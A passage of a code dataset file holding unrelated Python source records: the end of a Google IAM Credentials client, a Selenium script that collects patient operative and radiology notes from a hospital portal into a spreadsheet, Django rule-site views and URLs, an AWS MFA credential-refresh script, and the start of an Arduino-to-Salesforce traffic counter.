list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"generate_id_token\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def sign_blob(\n self,\n name,\n payload,\n delegates=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Signs a blob using a service account's system-managed private key.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `payload`:\n >>> payload = b''\n >>>\n >>> response = client.sign_blob(name, payload)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n payload (bytes): Required. The bytes to sign.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.SignBlobResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"sign_blob\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"sign_blob\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.sign_blob,\n default_retry=self._method_configs[\"SignBlob\"].retry,\n default_timeout=self._method_configs[\"SignBlob\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.SignBlobRequest(\n name=name, payload=payload, delegates=delegates\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"sign_blob\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n\n def sign_jwt(\n self,\n name,\n payload,\n delegates=None,\n retry=google.api_core.gapic_v1.method.DEFAULT,\n timeout=google.api_core.gapic_v1.method.DEFAULT,\n metadata=None,\n ):\n \"\"\"\n Signs a JWT using a service account's system-managed private key.\n\n Example:\n >>> from google.cloud import iam_credentials_v1\n >>>\n >>> client = iam_credentials_v1.IAMCredentialsClient()\n >>>\n >>> name = client.service_account_path('[PROJECT]', '[SERVICE_ACCOUNT]')\n >>>\n >>> # TODO: Initialize `payload`:\n >>> payload = ''\n >>>\n >>> response = client.sign_jwt(name, payload)\n\n Args:\n name (str): Required. The resource name of the service account for which the\n credentials are requested, in the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n payload (str): Required. The JWT payload to sign: a JSON object that contains a JWT Claims Set.\n delegates (list[str]): The sequence of service accounts in a delegation chain. Each service\n account must be granted the ``roles/iam.serviceAccountTokenCreator``\n role on its next service account in the chain. The last service account\n in the chain must be granted the\n ``roles/iam.serviceAccountTokenCreator`` role on the service account\n that is specified in the ``name`` field of the request.\n\n The delegates must have the following format:\n ``projects/-/serviceAccounts/{ACCOUNT_EMAIL_OR_UNIQUEID}``. The ``-``\n wildcard character is required; replacing it with a project ID is\n invalid.\n retry (Optional[google.api_core.retry.Retry]): A retry object used\n to retry requests. If ``None`` is specified, requests will\n be retried using a default configuration.\n timeout (Optional[float]): The amount of time, in seconds, to wait\n for the request to complete. Note that if ``retry`` is\n specified, the timeout applies to each individual attempt.\n metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata\n that is provided to the method.\n\n Returns:\n A :class:`~google.cloud.iam_credentials_v1.types.SignJwtResponse` instance.\n\n Raises:\n google.api_core.exceptions.GoogleAPICallError: If the request\n failed for any reason.\n google.api_core.exceptions.RetryError: If the request failed due\n to a retryable error and retry attempts failed.\n ValueError: If the parameters are invalid.\n \"\"\"\n # Wrap the transport method to add retry and timeout logic.\n if \"sign_jwt\" not in self._inner_api_calls:\n self._inner_api_calls[\n \"sign_jwt\"\n ] = google.api_core.gapic_v1.method.wrap_method(\n self.transport.sign_jwt,\n default_retry=self._method_configs[\"SignJwt\"].retry,\n default_timeout=self._method_configs[\"SignJwt\"].timeout,\n client_info=self._client_info,\n )\n\n request = common_pb2.SignJwtRequest(\n name=name, payload=payload, delegates=delegates\n )\n if metadata is None:\n metadata = []\n metadata = list(metadata)\n try:\n routing_header = [(\"name\", name)]\n except AttributeError:\n pass\n else:\n routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(\n routing_header\n )\n metadata.append(routing_metadata)\n\n return self._inner_api_calls[\"sign_jwt\"](\n request, retry=retry, timeout=timeout, metadata=metadata\n )\n","sub_path":"iam/google/cloud/iam_credentials_v1/gapic/iam_credentials_client.py","file_name":"iam_credentials_client.py","file_ext":"py","file_size_in_byte":26165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"348138679","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup\nimport time\nimport data\nimport secret\nimport pandas\n\n# newestDateformat = datetime.strptime('2001-01-24', '%Y-%m-%d')\n\npatientIdArrayLength = len(data.testPatientArray)\n\n\naggregatePatientInfo = {\n \"patientId\" : [],\n \"patientFirstSurgeryDate\" : [],\n \"firstOperationHeader\" : [],\n \"firstOperationNotes\" : [],\n \"postOpRadReport1Notes\" : [],\n \"postOpRadReport2Notes\" : [],\n \"postOpRadReport3Notes\" : [],\n \"patientNextSurgeryDate\" : [],\n \"nextOperationHeader\" : [],\n \"nextOperationNotes\" : [],\n \"preOpRadReport1Notes\" : [],\n \"preOpRadReport2Notes\" : [],\n \"preOpRadReport3Notes\" :[]\n}\n\n# Open the browser to the SD page\nchrome_path = r\"/usr/local/bin/chromedriver\"\ndriver = webdriver.Chrome(chrome_path)\ndriver.get('https://sd.app.vumc.org/sd-discover/')\ntime.sleep(8)\n\n\n# Login to account\nvunetid = driver.find_element_by_xpath('//*[@id=\"gwt-uid-3\"]')\npassword = driver.find_element_by_xpath('//*[@id=\"gwt-uid-5\"]')\nfirst_submit_button = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[5]/div')\n# Keep username and pass in secret file on local machine for security purposes\nvunetid.send_keys(secret.username)\npassword.send_keys(secret.password)\nfirst_submit_button.click()\ntime.sleep(15)\n\n\n# Choose Recurrence Database\nrecentDataSets = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[1]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[2]/div[1]/table/tbody/tr[1]/td[1]/div')\nrecentDataSets.click()\ntime.sleep(8)\nrecurrence = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[1]/div/div[2]/div/div[2]/div/div/div/div/div/div/div[2]/div[1]/table/tbody/tr[2]/td[1]')\nrecurrence.click()\ntime.sleep(8)\nreviewSetResults = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div/div[3]/div/div/div/div/div/div[3]/div/div/div/div/div[2]/div/div/div/table/tbody/tr[1]/td[3]/div')\nreviewSetResults.click()\ntime.sleep(10)\n\ndef firstfilterRadiologyReports():\n # Filter Radiology Reports for Individual Patient\n openFiltersButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div/div[1]/div')\n openFiltersButton.click()\n time.sleep(5)\n openFilterDropdownButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[1]/div/div[2]/div')\n openFilterDropdownButton.click()\n time.sleep(5)\n radiologyReportsOption = driver.find_element_by_xpath('//*[@id=\"VAADIN_COMBOBOX_OPTIONLIST\"]/div/div[2]/table/tbody/tr[11]')\n radiologyReportsOption.click()\n time.sleep(5)\n applyFilter = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[1]/div')\n applyFilter.click()\n time.sleep(5)\n\ndef secondfilterRadiologyReports():\n # Filter Radiology Reports for Individual Patient\n time.sleep(5)\n openFilterDropdownButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[1]/div/div[2]/div')\n openFilterDropdownButton.click()\n time.sleep(5)\n radiologyReportsOption = driver.find_element_by_xpath('//*[@id=\"VAADIN_COMBOBOX_OPTIONLIST\"]/div/div[2]/table/tbody/tr[11]')\n radiologyReportsOption.click()\n time.sleep(5)\n applyFilter = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[1]/div')\n applyFilter.click()\n time.sleep(5)\n\ndef iterativePatientResults():\n #Filter by PatientId\n for i in range(patientIdArrayLength): \n if i > 0:\n clearFilterButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[2]/div')\n time.sleep(1)\n clearFilterButton.click()\n searchPatient = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div[2]/div/div/input')\n searchPatient.clear()\n time.sleep(2)\n searchPatient.send_keys(data.patientIdArray[i])\n\n # adding patientId to data\n aggregatePatientInfo[\"patientId\"].append(data.patientIdArray[i])\n\n time.sleep(5)\n patientRow = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[1]/div/div[3]/div[1]/table/tbody/tr')\n patientRow.click()\n time.sleep(5)\n # we may actually not want to filter for reports since we need to do everything relative to all entries\n # filterRadiologyReports()\n # the below variable is storing the date of the patient's first operation\n firstSurgeryDate = data.firstSurgeryDateArray[i]\n print(firstSurgeryDate)\n # the below adds the first surgery date to the aggregate patient dataframe\n aggregatePatientInfo[\"patientFirstSurgeryDate\"].append(firstSurgeryDate)\n # the below variable will store the header text and the index position\n firstSurgeryHeader = ''\n firstSurgeryDivIndex = 0\n # Get the dates of all report sections so that you can compare them properly\n reportHeaders = driver.find_elements_by_class_name('doc-content')\n time.sleep(3)\n reportHeadersLength = len(reportHeaders)\n time.sleep(3)\n for firstReportHeaderIterator in range(reportHeadersLength):\n allText = reportHeaders[firstReportHeaderIterator].text\n date = allText[0:10]\n reportType = allText[-16:]\n dateFormat = time.strptime(date, '%Y-%m-%d')\n if dateFormat == time.strptime(firstSurgeryDate, '%m-%d-%y') and reportType == 'OPERATIVE REPORT':\n firstSurgeryHeader = reportHeaders[firstReportHeaderIterator].text\n firstSurgeryDivIndex = firstReportHeaderIterator\n break\n reportContent = driver.find_elements_by_class_name('doc-content-div')\n firstSurgeryNotes = reportContent[firstSurgeryDivIndex].text\n\n # adding first surgery header and notes to data\n aggregatePatientInfo[\"firstOperationHeader\"].append(firstSurgeryHeader)\n aggregatePatientInfo[\"firstOperationNotes\"].append(firstSurgeryNotes)\n\n # start filtering radiology reports\n if i == 0:\n firstfilterRadiologyReports()\n else:\n secondfilterRadiologyReports()\n\n radiologyReportHeaders = driver.find_elements_by_class_name('doc-content')\n radiologyReportNotes = driver.find_elements_by_class_name('doc-content-div')\n radiologyReportHeadersListLength = len(radiologyReportHeaders)\n time.sleep(3)\n firstThreeRadiologyReports = []\n\n # this for loop finds the notes for the three radiology report after the first surgery date\n for radiologyReportHeaderIterator in range(radiologyReportHeadersListLength):\n radiologyReportText = radiologyReportHeaders[radiologyReportHeaderIterator].text\n radiolgyReportDate = radiologyReportText[0:10]\n radiolgyReportDateFormat = time.strptime(radiolgyReportDate, '%Y-%m-%d')\n if radiolgyReportDateFormat >= time.strptime(firstSurgeryDate, '%m-%d-%y'):\n if len(firstThreeRadiologyReports) < 3:\n class firstRadiologyReportInfo:\n reportHeader = radiologyReportText\n reportIndex = radiologyReportHeaderIterator\n reportNotes = radiologyReportNotes[radiologyReportHeaderIterator].text\n firstThreeRadiologyReports.append(firstRadiologyReportInfo)\n else:\n break\n \n for yo in firstThreeRadiologyReports:\n print(yo.reportNotes)\n\n # this code accounts for a patient having less than 3 radiology reports\n # it goes in and adds blank report to get a patients total up to 3 if need be\n firstRadReportsLength = len(firstThreeRadiologyReports)\n if (firstRadReportsLength < 3):\n numberToAdd = 3 - firstRadReportsLength\n for adds in range(numberToAdd):\n class blankRadiologyReportInfo:\n reportHeader = ''\n reportIndex = ''\n reportNotes = ''\n firstThreeRadiologyReports.append(blankRadiologyReportInfo)\n \n\n aggregatePatientInfo[\"postOpRadReport1Notes\"].append(firstThreeRadiologyReports[0].reportNotes)\n aggregatePatientInfo[\"postOpRadReport2Notes\"].append(firstThreeRadiologyReports[1].reportNotes)\n aggregatePatientInfo[\"postOpRadReport3Notes\"].append(firstThreeRadiologyReports[2].reportNotes)\n \n\n \n # This begins the fining of the second surgery notes\n nextSurgeryDate = data.nextSurgeryDateArray[i]\n aggregatePatientInfo[\"patientNextSurgeryDate\"].append(nextSurgeryDate)\n nextSurgeryDivIndex = 0\n nextSurgeryHeader = ''\n clearFilterButton = driver.find_element_by_xpath('//*[@id=\"sddiscover-1207851718\"]/div/div[2]/div/div[2]/div/div/div/div/div/div[2]/div/div[2]/div/div/div/div/div[3]/div/div/div[1]/div/div/div[2]/div/div[2]/div/div/div/div/div[2]/div/div[2]/div/div[2]/div/div[3]/div/div[2]/div/div[2]/div')\n clearFilterButton.click()\n time.sleep(5)\n reportHeaders = driver.find_elements_by_class_name('doc-content')\n reportHeadersLength = len(reportHeaders)\n for secondReportHeaderIterator in range(reportHeadersLength):\n allText = reportHeaders[secondReportHeaderIterator].text\n date = allText[0:10]\n reportType = allText[-16:]\n dateFormat = time.strptime(date, '%Y-%m-%d')\n if dateFormat == time.strptime(nextSurgeryDate, '%m-%d-%y') and reportType == 'OPERATIVE REPORT':\n nextSurgeryHeader = reportHeaders[secondReportHeaderIterator].text\n nextSurgeryDivIndex = secondReportHeaderIterator\n break\n reportContent = driver.find_elements_by_class_name('doc-content-div') \n nextSurgeryNotes = reportContent[nextSurgeryDivIndex].text\n\n\n aggregatePatientInfo[\"nextOperationHeader\"].append(nextSurgeryHeader)\n aggregatePatientInfo[\"nextOperationNotes\"].append(nextSurgeryNotes)\n\n\n\n secondfilterRadiologyReports()\n reversedRadiologyReportHeaders = driver.find_elements_by_class_name('doc-content')\n reversedRadiologyReportHeaders.reverse()\n reversedRadiologyReportNotes = driver.find_elements_by_class_name('doc-content-div')\n reversedRadiologyReportNotes.reverse()\n reversedRadiologyReportHeadersLength = len(reversedRadiologyReportHeaders)\n time.sleep(3)\n LastThreeRadiologyReports = []\n\n # this for loop finds the notes for the three radiology report after the first surgery date\n for reversedRadiologyReportHeaderIterator in range(reversedRadiologyReportHeadersLength):\n reveresdRadiologyReportText = reversedRadiologyReportHeaders[reversedRadiologyReportHeaderIterator].text\n reversedRadiolgyReportDate = reveresdRadiologyReportText[0:10]\n reversedRadiolgyReportDateFormat = time.strptime(reversedRadiolgyReportDate, '%Y-%m-%d')\n if reversedRadiolgyReportDateFormat <= time.strptime(nextSurgeryDate, '%m-%d-%y'):\n if len(LastThreeRadiologyReports) < 3:\n class lastRadiologyReportInfo:\n reversedReportHeader = reveresdRadiologyReportText\n reversedReportIndex = reversedRadiologyReportHeaderIterator\n reversedReportNotes = reversedRadiologyReportNotes[reversedRadiologyReportHeaderIterator].text\n LastThreeRadiologyReports.append(lastRadiologyReportInfo)\n else:\n break\n \n\n # this code accounts for a patient having less than 3 radiology reports\n # it goes in and adds blank report to get a patients total up to 3 if need be\n LastRadReportsLength = len(LastThreeRadiologyReports)\n if (LastRadReportsLength < 3):\n numberToAdd = 3 - LastRadReportsLength\n for adds in range(numberToAdd):\n class blankRadiologyReportInfo:\n reversedReportHeader = ''\n reversedReportIndex = ''\n reversedReportNotes = ''\n LastThreeRadiologyReports.append(blankRadiologyReportInfo)\n\n \n aggregatePatientInfo[\"preOpRadReport1Notes\"].append(LastThreeRadiologyReports[0].reversedReportNotes)\n aggregatePatientInfo[\"preOpRadReport2Notes\"].append(LastThreeRadiologyReports[1].reversedReportNotes)\n aggregatePatientInfo[\"preOpRadReport3Notes\"].append(LastThreeRadiologyReports[2].reversedReportNotes)\n\n\n\niterativePatientResults()\n\ndf = pandas.DataFrame(aggregatePatientInfo)\n\ndf.to_excel(\"test_output.xlsx\")\n\n\n\n\n\n \n","sub_path":"selenium_scraper.py","file_name":"selenium_scraper.py","file_ext":"py","file_size_in_byte":13245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"208884408","text":"# Create your views here.\n# -*- coding:utf-8 -*-\n\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template import RequestContext\nfrom django.shortcuts import get_object_or_404, render_to_response\nfrom rules.models import RuleType, Rule, RulePart\nfrom lib.myqs import MyQS\nimport inspect\nfrom django.contrib.auth import logout, authenticate, login\n\ndef index(request,type='all',id=0):\n\tprint (\"Call index\")\n\ton_page = int(3)\n\tpage_id = int(1)\n\tparam = __for_all()\n\tparam['content'] = 'Это строка';\n\tparam['type'] = (type if type != 'all' else 'none')\n\tparam['id'] = (id if id else 'none')\n\n\tlist = ''\n\tmyqs = ''\n\tstart = (page_id-1)*on_page\n\tfinish = page_id*on_page+1\n\n\tif type == 'all':\n\t\t# первая страница, показываем topten\n\t\trules = RulePart.objects.filter(rule_id__topten=True).filter(sort=10).order_by('-id')[:on_page];\n\t\tmyqs = MyQS(rules,on_page,page_id)\n\t\tparam['list'] = myqs.get();\n\telse:\n\t\trules = RulePart.objects.filter(rule_id__type__url_name=type).filter(sort=10).order_by('-id')[:on_page];\n\t\tmyqs = MyQS(rules,on_page,page_id)\n\t\tparam['list'] = myqs.get();\n\t\tparam['next_page']=myqs.get_next_page()\n\t\tparam['prev_page']=myqs.get_prev_page()\n\n\n\treturn render_to_response('rules/index.html', param)\n\ndef show_rule(request, rule_id,back_url=\"/\",page_no=1):\n\tprint (\"Call show_rule\")\n\tparam = __for_all()\n\tparam['list'] = RulePart.objects.filter(rule_id=rule_id).order_by('sort')\n\tparam['game'] = Rule.objects.get(pk=rule_id)\n\tparam['back_url'] = back_url\n\tparam['page_no'] = page_no\n\treturn render_to_response('rules/rule.html', param)\n\ndef myadmin(request):\n\tyes = 'no'\n\tif request.user.is_authenticated():\n\t\tyes = 'yes'\n\t\tparam = __for_all()\n\t\tparam['username'] = request.user.username\n\t\treturn render_to_response('rules/myadmin.html', param)\n\telse:\n\t\treturn HttpResponseRedirect('/rules/a/login/')\n\ndef gologin():\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tuser = authenticate(username=username, password=password)\n\tif user is not None:\n\t\tif user.is_active:\n\t\t\tlogin(request, user)\n\t\t\treturn HttpResponseRedirect('/rules/a/') \n\t\telse:\n\t\t\treturn HttpResponseRedirect('/rules/a/login/')\n\telse:\n\t\treturn HttpResponseRedirect('/rules/a/login/')\n\ndef mylogin(request):\n\tparam = __for_all()\n\treturn render_to_response('rules/mylogin.html', param)\n\ndef mylogout(request):\n\tlogout(request)\n\treturn HttpResponseRedirect('/')\n\ndef __for_all():\n\t'''\n\tдействия для всех случаев\n\t'''\n\tp = {}\n\tp['fname'] = inspect.stack()[1][3]\n\tp['menu'] = RuleType.objects.all().order_by('show_name');\n\treturn p","sub_path":"rules/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"10030436","text":"\"\"\"If you are using AWS CLI with an IAM account that requires MFA\r\nit's easy enough to query for temporary credentials \r\nhttps://aws.amazon.com/premiumsupport/knowledge-center/authenticate-mfa-cli/\r\nYou can manually export them (or try to automate that in bash with the use of e.g. jq to parse JSON response)\r\nHowever, if you are in the need of updating your .aws/credentials file, \r\ndoing it manually every time your session token will expire is an annoying endeavor. \r\nThis script will use your currently chosen AWS_PROFILE (default when nothing is selected) to:\r\n1. Use sts get-session-token with MFA code You provide to get temporary credentials. \r\n2. Create an MFA profile in your .aws/credentials file if this profile does not exist \r\n3. Update an MFA profile in your .aws/credentials file if this profile does exist. \r\nTESTED ONLY ON WINDOWS AND LINUX !!!!\r\n\"\"\"\r\n\r\nimport argparse\r\nimport boto3\r\nfrom dateutil import tz\r\nimport sys\r\nfrom pathlib import Path\r\n\r\nserial_number = \"\"\r\ntoken_code = \"\"\r\nduration = \"\"\r\nAccessKeyId = \"\"\r\nSecretAccessKey = \"\"\r\nSessionToken = \"\"\r\naws_profile_to_use = \"\"\r\n\r\ndef main():\r\n pull_args()\r\n get_temp_credentials()\r\n update_profiles()\r\n\r\ndef pull_args():\r\n global serial_number\r\n global token_code\r\n global duration\r\n global aws_profile_to_use\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument(\"-s\", \"--serial-number\", required = True, help = \"MFA device ARN\")\r\n parser.add_argument(\"-t\", \"--token-code\", required = True, help = \"One time password / token generated by MFA device\")\r\n parser.add_argument(\"-d\", \"--duration\", default = 3600, help = \"Session duration in seconds defaults to 3600 sec (1h) \" )\r\n parser.add_argument(\"-p\", \"--aws-profile\", default = \"default\", help = \"Profile to use when pulling credentials. Defaults to 'default'\" )\r\n args = parser.parse_args()\r\n aws_profile_to_use = args.aws_profile\r\n serial_number = args.serial_number\r\n token_code = args.token_code\r\n duration = int(args.duration)\r\n\r\ndef get_temp_credentials():\r\n global serial_number\r\n global token_code\r\n global duration\r\n global AccessKeyId\r\n global SecretAccessKey\r\n global SessionToken\r\n global aws_profile_to_use\r\n\r\n session = boto3.Session(profile_name=aws_profile_to_use)\r\n client = session.client('sts')\r\n response = client.get_session_token(\r\n DurationSeconds=duration,\r\n SerialNumber=serial_number,\r\n TokenCode=token_code\r\n )\r\n AccessKeyId = response['Credentials']['AccessKeyId']\r\n SecretAccessKey = response['Credentials']['SecretAccessKey']\r\n SessionToken = response['Credentials']['SessionToken']\r\n expiry_date = response['Credentials']['Expiration']\r\n current_time_zone = tz.tzlocal()\r\n current_tz_exp_date = expiry_date.astimezone(current_time_zone)\r\n print(f'Bear in mind that session will expire at: {expiry_date} UTC. In your local Time Zone that is: {current_tz_exp_date}')\r\n\r\ndef update_profiles():\r\n update_config_file()\r\n update_credentials_file()\r\n\r\ndef update_credentials_file():\r\n global AccessKeyId\r\n global SecretAccessKey\r\n global SessionToken\r\n path = calculate_path()+\"credentials\"\r\n current_file = open(path, \"r\")\r\n string_list = current_file.readlines()\r\n current_file.close()\r\n if '[mfa]\\n' in string_list:\r\n print('Updating existing profile in credentials file')\r\n profile_index = string_list.index('[mfa]\\n')\r\n string_list[profile_index+1] = f'aws_access_key_id = {AccessKeyId}\\n'\r\n string_list[profile_index+2] = f'aws_secret_access_key = {SecretAccessKey}\\n'\r\n string_list[profile_index+3] = f'aws_session_token = {SessionToken}\\n'\r\n else:\r\n print('Creating new profile in credentials file')\r\n string_list.append('\\n')\r\n string_list.append('[mfa]\\n')\r\n string_list.append(f'aws_access_key_id = {AccessKeyId}\\n')\r\n string_list.append(f'aws_secret_access_key = {SecretAccessKey}\\n')\r\n string_list.append(f'aws_session_token = {SessionToken}\\n')\r\n\r\n current_file = open(path, \"w\")\r\n content = \"\".join(string_list)\r\n current_file.write(content)\r\n current_file.close()\r\n\r\n\r\ndef update_config_file():\r\n path = calculate_path()+\"config\"\r\n current_file = open(path, \"r\")\r\n string_list = current_file.readlines()\r\n current_file.close()\r\n if '[mfa]\\n' in string_list:\r\n print('Updating existing profile in config file')\r\n profile_index = string_list.index('[mfa]\\n')\r\n string_list[profile_index+1] = 'region = eu-west-1\\n'\r\n else:\r\n print('Creating new profile in config file')\r\n string_list.append('\\n')\r\n string_list.append('[mfa]\\n')\r\n string_list.append('region = eu-west-1\\n')\r\n\r\n current_file = open(path, \"w\")\r\n content = \"\".join(string_list)\r\n current_file.write(content)\r\n current_file.close()\r\n\r\ndef calculate_path():\r\n home = str(Path.home())\r\n return f\"{home}/.aws/\"\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"update_credentials_with_mfa.py","file_name":"update_credentials_with_mfa.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"148872308","text":"from django.conf.urls import url\r\nfrom . import views\r\n\r\n\r\nhandler404 = 'main.views.page_not_found_view'\r\nhandler500 = 'main.views.error_view'\r\nhandler403 = 'main.views.permission_denied_view'\r\nhandler400 = 'main.views.bad_request_view'\r\n\r\nurlpatterns = [\r\n url(r'^(?i)quickstart/', views.quick_start, name='quick_start'),\r\n url(r'^(?i)use/autohotkey/', views.use_auth, name='use_ahk'),\r\n url(r'^$', views.introduction, name='introduction'),\r\n]\r\n","sub_path":"docs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"189474784","text":"# Serial Data Streaming from Arduino to Salesforce\n# Created by: Jack Galletta, Summer 2019\n# jgalletta@salesforce.com\n\n# import packages\nfrom simple_salesforce import Salesforce, SalesforceLogin\nfrom Credentials import username, password\nimport serial\nimport threading\nimport datetime\nimport re\n\n\n# logging into Salesforce\nsession_id, instance = SalesforceLogin(username=username, password=password)\nsf = Salesforce(instance=instance, session_id=session_id)\nprint('Successfully logged in!')\nprint('Wating to detect cars...')\n# Logged in! Now perform API actions, SOQL queries, etc.\n\n# object to read in serial data from port: '/dev/cu.usbmodem14201'\narduinoData = serial.Serial('/dev/cu.usbmodem14201', 9600)\n\nmyid = str(sf.query(\"SELECT Id FROM Traffic_Tracker__c\"))\npattern = \"'Id', '(.{18})'\"\nr1 = re.findall(pattern, myid)\nttid = r1[0]\n\n#query besthour object and strip the ID value\nconstquery = str(sf.query(\"SELECT BHID__c FROM BestHourConst__c\"))\nid = str(sf.query(\"SELECT Id FROM Best_Hour__c\"))\npattern = \"'Id', '(.{18})'\"\nr1 = re.findall(pattern, id)\nbhid = r1[0]\nif constquery[27] == '0':\n sf.BestHourConst__c.create({\"BHID__c\": bhid})\n besthourconstupdate = str(sf.query(\"SELECT BHID__c FROM BestHourConst__c\"))\n print(\"First time setup is complete!\")\n\n# creating variables to store data and upload to org\ncarCount = 0\nsensorCount = 0\ndata = 0\nupdated = True\ntotalCars = 0\n\n# opens previously saved car per hour values into array called fullday\nfullday = []\nwith open(\"hourrecord.txt\", 'r') as f:\n for line in f:\n fullday.append(int(line.strip()))\n\ndef bestHour():\n threading.Timer(5, bestHour).start()\n\n currentDT = datetime.datetime.now()\n\n # determines and assigns best hour fields\n #fullday[int(currentDT.strftime(\"%H\"))] += 1\n\n #print(fullday)\n currhour = int(currentDT.strftime(\"%H\"))\n\n # for medium and low priority cases, searches through next 6 hours of traffic data\n medsubset = (fullday[currhour: currhour + 6])\n\n # for high priority cases, searches through next 3 hours of traffic data\n highsubset = (fullday[currhour: currhour + 3])\n\n # for critical cases, select the current hour as best time\n\n medminindex = currhour\n # print(medsubset)\n medmin = medsubset[0]\n for i in range(len(medsubset)):\n if medsubset[i] < medmin:\n medmin 